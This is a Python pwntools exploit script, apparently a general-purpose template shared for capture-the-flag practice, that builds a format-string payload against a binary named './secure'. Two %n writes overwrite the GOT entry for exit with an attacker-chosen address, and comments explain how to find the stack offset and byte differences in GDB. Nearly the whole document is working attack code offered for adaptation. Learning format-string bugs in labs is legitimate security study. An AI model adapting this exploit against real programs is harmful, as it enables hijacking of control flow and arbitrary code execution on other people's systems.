Format String/printf Vulnerability

1. #!/usr/bin/env python
2.  
3. '''
4. John Hammond
5. FULL DISCLAIMER:
6.  This aims to be a general purpose script... but you will need to modify it
7.  as you work with exploring the problem you are on. There are a couple steps of
8.  manual testing, and I try to explain these in the comments below.
9. '''
10.  
11.  
12. from pwn import *
13.  
14. context.log_level = 'critical'
15.  
16. elf = ELF('./secure')
17.  
18. # These are the addresses in memory that you want to overwrite. YOU WILL NEED TO CHANGE THESE
19. # You can find these with pwntools (elf.got['<function_name>']) or `readelf -s <binary_name>`
20. overwite = elf.got['exit'] # this is the value that you want to OVERWRITE...
21. to_write = 0x08048713 # this is the value that you want TO OVERWRITE IT WITH...
22.  
23.  
24.  
25. # For initial testing, you will first need to discover MANUALLY..:
26. ### This is the size of the buffer that you can write into. We use this for padding.
27. # (You can find this with Hopper or IDA if you don't have source code given).
28. length_of_buffer = 64
29. ### This is the offset of our buffer on the stack. (the position of AAAA for testing)
30. offset = 35
31.  
32. ### These values come from testing in GDB.... YOU WILL NEED TO DO THIS MANUALLY
33. testing_value = 30  # use this when replacing
34.  
35. first_difference = 0x2e # this is the value you see replacing the GOT entry after FIRST test
36.                         # (the LAST FOUR BYTES hex, the LOW BYTES)
37. first_difference -= testing_value    # NO NEED TO CHANGE THIS LINE
38. second_difference = 0x8731 # this is the value you see the SECOND time you test.
39.                            # (the first FOUR BYTES, the HIGH BYTES
40. second_difference -= testing_value # NO NEED TO CHANGE THIS LINE
41.  
42.  
43. # --------------------------------------------------------------------------------------------
44.  
45. # These variables help do the math for you. DO NOT CHANGE THESE VARIABLES
46. LOW_BYTES = str(hex(to_write)[-4:])
47. LOW_BYTES_DIFFERENCE = int(LOW_BYTES,16) - first_difference
48. HIGH_BYTES = '1'+hex(to_write)[2:-4].zfill(4)
49. HIGH_BYTES_DIFFERENCE = int(HIGH_BYTES, 16) - second_difference
50.  
51. # Convenience function for padding, no need to change
52. def pad(s): return s + "X" * ( length_of_buffer - len(s) )
53.  
54.  
55. #### You will have to tweak this to test in GDB.
56. exploit = ""
57. exploit += p32(overwite)                   # this will be filled with the LOW BYTES DIFFERENCE...
58. exploit += p32(overwite+1)                 # this fills HIGH BYTES (+1 for next pos. on stack)...
59. exploit += 'AAAABBBB'                      #
60. # exploit += '$<#change_to_test_offset>$x' ### USED FOR TESTING OFFSET... NOT NEEDED FOR PAYLOAD
61.  
62. # exploit += '%'+str(offset)+'$'+str(testing_value)+'x'         ### USED FOR FIRST TEST...
63.                                                                 ### (COMMENT OUT THE 2ND TEST BELOW!!)
64. exploit += '%'+str(offset)+'$'+str(LOW_BYTES_DIFFERENCE)+'x'    # use this line for payload
65.                                                                 # when variable above are filled
66. exploit += '%'+str(offset)+'$n' # used to write the value!
67.  
68. # exploit += '%'+str(offset+1)+'$'+str(testing_value)+'x'       ### USED FOR SECOND TEST...
69.                                                                 ### (KEEP THE FIRST TEST ABOVE)
70. exploit += '%'+str(offset+1)+'$'+str(HIGH_BYTES_DIFFERENCE)+'x'
71.                                                                 # when variable above are filled
72. exploit += '%'+str(offset+1)+'$n' # used to write the value!
73.  
74.  
75. print exploit